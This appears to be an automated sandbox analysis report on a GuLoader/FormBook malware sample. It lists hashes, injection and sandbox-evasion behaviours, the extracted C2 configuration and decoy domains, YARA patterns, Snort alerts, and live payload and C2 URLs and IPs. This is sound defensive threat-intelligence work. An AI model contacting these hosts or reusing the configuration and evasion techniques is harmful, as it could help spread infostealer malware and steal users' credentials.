Edit tour

Windows Analysis Report
wLlREXsA9M.exe

Overview

General Information

Sample Name:	wLlREXsA9M.exe
Analysis ID:	1284625
MD5:	08defe80ace1f032875c8127ae5e4481
SHA1:	2d7ba957be6c89cd3633a63dfd8e925a90d40bd4
SHA256:	ac131e3fbcd040f4a5f0dc8e90d3c77bb98d934d5c6696de510ca89f18599062
Infos:

Detection

FormBook, GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected FormBook

Malicious sample detected (through community Yara rule)

System process connects to network (likely due to code injection or exploit)

Antivirus detection for URL or domain

Yara detected GuLoader

Snort IDS alert for network traffic

Sample uses process hollowing technique

Uses netstat to query active network connections and open ports

Maps a DLL or memory area into another process

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Performs DNS queries to domains with low reputation

Modifies the prolog of user mode functions (user mode inline hooks)

Queues an APC in another process (thread injection)

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Uses 32bit PE files

Yara signature match

May sleep (evasive loops) to hinder dynamic analysis

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Sample file is different than original file name gathered from version info

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Checks if the current process is being debugged

PE / OLE file has an invalid certificate

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w10x64native

wLlREXsA9M.exe (PID: 7392 cmdline: C:\Users\user\Desktop\wLlREXsA9M.exe MD5: 08DEFE80ACE1F032875C8127AE5E4481)

wLlREXsA9M.exe (PID: 7852 cmdline: C:\Users\user\Desktop\wLlREXsA9M.exe MD5: 08DEFE80ACE1F032875C8127AE5E4481)

explorer.exe (PID: 5560 cmdline: C:\Windows\Explorer.EXE MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7)

autochk.exe (PID: 8396 cmdline: C:\Windows\SysWOW64\autochk.exe MD5: 95127C028063423E1253BD0C8CD6C9CB)

NETSTAT.EXE (PID: 8548 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 9DB170ED520A6DD57B5AC92EC537368A)

cmd.exe (PID: 2108 cmdline: /c del "C:\Users\user\Desktop\wLlREXsA9M.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 4792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://asec.ahnlab.com/en/32149/ https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/ https://blog.malwarebytes.com/scams/2020/08/sba-phishing-scams-from-malware-to-advanced-social-engineering/ https://blog.morphisec.com/guloader-the-rat-downloader	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.civzbpp.xyz/ms14/"], "decoy": ["adjoinstaff.online", "kmmdznky.cfd", "keyviewgroup.com", "kidomarketing.com", "jroxtqpq.cfd", "jdevmx.com", "genqaagz.cfd", "1cdpwp.cfd", "francegoldvip.com", "2qy218.xyz", "peterscanner.com", "trullys.com", "aniwatch.top", "windyhillcnc.com", "pokazhu.com", "r74jsy.cfd", "paulgadgets.com", "lindanewtee.com", "lasik-de-de-8808230.zone", "critone.site", "qwevqgjw.cfd", "lojaasoriginais.online", "pgtjirqx.cfd", "ypasbfxplu.shop", "kartixworld.com", "s6uqzj.com", "xigauij.cfd", "arizonaadoptionagencies.com", "wecanshipit.com", "chiccakes.site", "v3rqa4.cfd", "clasmiv.xyz", "kwhkqovf.cfd", "metabolismchecker.click", "lilith-con.com", "porterhayranch.com", "rikkun501.com", "sxbhpysr.cfd", "jc1014.com", "4213z0.com", "wshaizapp.site", "3jij6e.cfd", "weddingscork.com", "zingyi.com", "ixs0o9.com", "tchyhg.com", "printsplit.online", "nihil.one", "worthitweld.com", "venria.store", "lglcyoy.cfd", "kanmuftic.com", "zbjcolwy.cfd", "mlking99.net", "eyyk63.cfd", "tcnckkne.cfd", "buddhabazaar.online", "tissageparis.com", "cacciatoridiofferte.com", "duffledash.com", "kmsvvybi.cfd", "aqeabrdm.cfd", "qhrxnxoe.cfd", "fitnessline.app"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.1031033084.000000000078B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_GuLoader_3	Yara detected GuLoader	Joe Security
00000003.00000002.1062248896.00000000000A0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.1062248896.00000000000A0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000002.1062248896.00000000000A0000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.1062248896.00000000000A0000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.1062248896.00000000000A0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000006.00000002.5845901984.0000000002F60000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.5845901984.0000000002F60000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000006.00000002.5845901984.0000000002F60000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000002.5845901984.0000000002F60000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000002.5845901984.0000000002F60000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000003.00000002.1090665531.00000000324F0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.1090665531.00000000324F0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000002.1090665531.00000000324F0000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.1090665531.00000000324F0000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.1090665531.00000000324F0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000006.00000002.5845111818.0000000002E00000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.5845111818.0000000002E00000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000006.00000002.5845111818.0000000002E00000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000002.5845111818.0000000002E00000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000002.5845111818.0000000002E00000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000004.00000002.5876788993.0000000010B5C000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_772cc62d	unknown	unknown	0x9e2:$a2: pass 0x9e8:$a3: email 0x9ef:$a4: login 0x9f6:$a5: signin 0xa07:$a6: persistent 0xbda:$r1: C:\Users\user\AppData\Roaming\L855RR1R\L85log.ini
00000006.00000002.5843391506.00000000007D0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.5843391506.00000000007D0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000006.00000002.5843391506.00000000007D0000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000002.5843391506.00000000007D0000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000002.5843391506.00000000007D0000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000000.00000002.1033536083.0000000004F47000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: wLlREXsA9M.exe PID: 7392	JoeSecurity_GuLoader_3	Yara detected GuLoader	Joe Security
Process Memory Space: wLlREXsA9M.exe PID: 7852	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x10dbb5:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: NETSTAT.EXE PID: 8548	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x10eded:$a1: 3C 30 50 4F 53 54 74 09 40 0x111f8a:$a1: 3C 30 50 4F 53 54 74 09 40 0x1b7ed6:$a1: 3C 30 50 4F 53 54 74 09 40
Click to see the 26 entries

Snort Signatures

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.11.20 - Destination IP: 107.148.132.46

Timestamp:	192.168.11.20107.148.132.4649890802031412 08/02/23-20:42:14.890453
SID:	2031412
Source Port:	49890
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Generic .bin download from Dotted Quad - Source IP: 192.168.11.20 - Destination IP: 198.46.176.189

Timestamp:	192.168.11.20198.46.176.18949842802018752 08/02/23-20:35:21.593019
SID:	2018752
Source Port:	49842
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.11.20 - Destination IP: 107.148.132.46

Timestamp:	192.168.11.20107.148.132.4649871802031412 08/02/23-20:36:48.343466
SID:	2031412
Source Port:	49871
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.11.20 - Destination IP: 199.188.104.120

Timestamp:	192.168.11.20199.188.104.12049867802031412 08/02/23-20:36:06.692983
SID:	2031412
Source Port:	49867
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query to a *.top domain - Likely Hostile - Source IP: 192.168.11.20 - Destination IP: 9.9.9.9

Timestamp:	192.168.11.209.9.9.959142532023883 08/02/23-20:40:13.224871
SID:	2023883
Source Port:	59142
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.11.20 - Destination IP: 52.76.96.91

Timestamp:	192.168.11.2052.76.96.9149873802031412 08/02/23-20:37:10.365400
SID:	2031412
Source Port:	49873
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.11.20 - Destination IP: 45.77.219.226

Timestamp:	192.168.11.2045.77.219.22649878802031412 08/02/23-20:38:31.526546
SID:	2031412
Source Port:	49878
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000003.00000002.1062248896.00000000000A0000.00000040.10000000.00040000.00000000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.civzbpp.xyz/ms14/"], "decoy": ["adjoinstaff.online", "kmmdznky.cfd", "keyviewgroup.com", "kidomarketing.com", "jroxtqpq.cfd", "jdevmx.com", "genqaagz.cfd", "1cdpwp.cfd", "francegoldvip.com", "2qy218.xyz", "peterscanner.com", "trullys.com", "aniwatch.top", "windyhillcnc.com", "pokazhu.com", "r74jsy.cfd", "paulgadgets.com", "lindanewtee.com", "lasik-de-de-8808230.zone", "critone.site", "qwevqgjw.cfd", "lojaasoriginais.online", "pgtjirqx.cfd", "ypasbfxplu.shop", "kartixworld.com", "s6uqzj.com", "xigauij.cfd", "arizonaadoptionagencies.com", "wecanshipit.com", "chiccakes.site", "v3rqa4.cfd", "clasmiv.xyz", "kwhkqovf.cfd", "metabolismchecker.click", "lilith-con.com", "porterhayranch.com", "rikkun501.com", "sxbhpysr.cfd", "jc1014.com", "4213z0.com", "wshaizapp.site", "3jij6e.cfd", "weddingscork.com", "zingyi.com", "ixs0o9.com", "tchyhg.com", "printsplit.online", "nihil.one", "worthitweld.com", "venria.store", "lglcyoy.cfd", "kanmuftic.com", "zbjcolwy.cfd", "mlking99.net", "eyyk63.cfd", "tcnckkne.cfd", "buddhabazaar.online", "tissageparis.com", "cacciatoridiofferte.com", "duffledash.com", "kmsvvybi.cfd", "aqeabrdm.cfd", "qhrxnxoe.cfd", "fitnessline.app"]}

Multi AV Scanner detection for submitted file

Source: wLlREXsA9M.exe	Virustotal: Detection: 29%			Perma Link
Source: wLlREXsA9M.exe	ReversingLabs: Detection: 28%

Yara detected FormBook

Source: Yara match	File source: 00000003.00000002.1062248896.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.5845901984.0000000002F60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1090665531.00000000324F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.5845111818.0000000002E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.5843391506.00000000007D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Antivirus detection for URL or domain

Source: http://www.wshaizapp.site/ms14/www.lilith-con.com	Avira URL Cloud: Label: phishing
Source: http://www.civzbpp.xyz/ms14/	Avira URL Cloud: Label: phishing
Source: http://www.aniwatch.top/ms14/www.jroxtqpq.cfd	Avira URL Cloud: Label: phishing
Source: http://www.aniwatch.top/ms14/www.genqaagz.cfd	Avira URL Cloud: Label: phishing
Source: http://www.civzbpp.xyz/ms14/www.lojaasoriginais.online	Avira URL Cloud: Label: phishing
Source: http://www.wshaizapp.site/ms14/	Avira URL Cloud: Label: phishing
Source: http://www.clasmiv.xyz/ms14/www.duffledash.com	Avira URL Cloud: Label: phishing
Source: http://www.aniwatch.top/ms14/?1b-=CKdxKfUSo22ZA3LOsCE+RVTQXZ6VDMwkgwUFVpD0jjvtMSwdrQmMlQAEfm5imY1vlK4D&5jjx=X41P	Avira URL Cloud: Label: phishing
Source: http://198.46.176.189/windows/kHjzvgNVUFKkek92.bin	Avira URL Cloud: Label: malware
Source: http://www.aniwatch.top/ms14/?1b-=CKdxKfUSo22ZA3LOsCE+RVTQXZ6VDMwkgwUFVpD0jjvtMSwdrQmMlQAEfm5imY1vlK4D&-Zxtd=AXLT	Avira URL Cloud: Label: phishing
Source: http://www.clasmiv.xyz/ms14/	Avira URL Cloud: Label: phishing
Source: http://198.46.176.189/	Avira URL Cloud: Label: malware
Source: http://198.46.176.189/windows/kHjzvgNVUFKkek92.bin.	Avira URL Cloud: Label: malware

Source: wLlREXsA9M.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: wLlREXsA9M.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: netstat.pdbGCTL source: wLlREXsA9M.exe, 00000003.00000002.1062526617.00000000000D0000.00000040.10000000.00040000.00000000.sdmp, wLlREXsA9M.exe, 00000003.00000003.1060364102.00000000025BE000.00000004.00000020.00020000.00000000.sdmp, wLlREXsA9M.exe, 00000003.00000002.1077566633.00000000025B5000.00000004.00000020.00020000.00000000.sdmp, wLlREXsA9M.exe, 00000003.00000003.1060941431.00000000025C5000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000006.00000002.5844903994.0000000000C30000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: mshtml.pdb source: wLlREXsA9M.exe, 00000003.00000001.908308746.0000000000649000.00000020.00000001.01000000.00000005.sdmp
Source:	Binary string: netstat.pdb source: wLlREXsA9M.exe, 00000003.00000002.1062526617.00000000000D0000.00000040.10000000.00040000.00000000.sdmp, wLlREXsA9M.exe, 00000003.00000003.1060364102.00000000025BE000.00000004.00000020.00020000.00000000.sdmp, wLlREXsA9M.exe, 00000003.00000002.1077566633.00000000025B5000.00000004.00000020.00020000.00000000.sdmp, wLlREXsA9M.exe, 00000003.00000003.1060941431.00000000025C5000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000006.00000002.5844903994.0000000000C30000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: wLlREXsA9M.exe, 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, wLlREXsA9M.exe, 00000003.00000003.972434290.00000000324F3000.00000004.00000020.00020000.00000000.sdmp, wLlREXsA9M.exe, 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmp, wLlREXsA9M.exe, 00000003.00000003.977676200.00000000326AC000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000006.00000002.5846531217.00000000032FD000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000006.00000003.1066447293.000000000301C000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000006.00000002.5846531217.00000000031D0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000006.00000003.1061733268.0000000002E62000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: wLlREXsA9M.exe, wLlREXsA9M.exe, 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, wLlREXsA9M.exe, 00000003.00000003.972434290.00000000324F3000.00000004.00000020.00020000.00000000.sdmp, wLlREXsA9M.exe, 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmp, wLlREXsA9M.exe, 00000003.00000003.977676200.00000000326AC000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000006.00000002.5846531217.00000000032FD000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000006.00000003.1066447293.000000000301C000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000006.00000002.5846531217.00000000031D0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000006.00000003.1061733268.0000000002E62000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mshtml.pdbUGP source: wLlREXsA9M.exe, 00000003.00000001.908308746.0000000000649000.00000020.00000001.01000000.00000005.sdmp

Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 0_2_0040562F GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,LdrInitializeThunk,FindNextFileA,FindClose,	0_2_0040562F
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 0_2_00406091 FindFirstFileA,FindClose,	0_2_00406091
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 0_2_0040270B FindFirstFileA,	0_2_0040270B

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 188.114.97.14 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 198.252.102.187 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 52.76.96.91 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 107.148.83.209 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 185.238.87.6 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 107.148.132.46 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 23.227.38.65 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 199.59.243.224 80	Jump to behavior
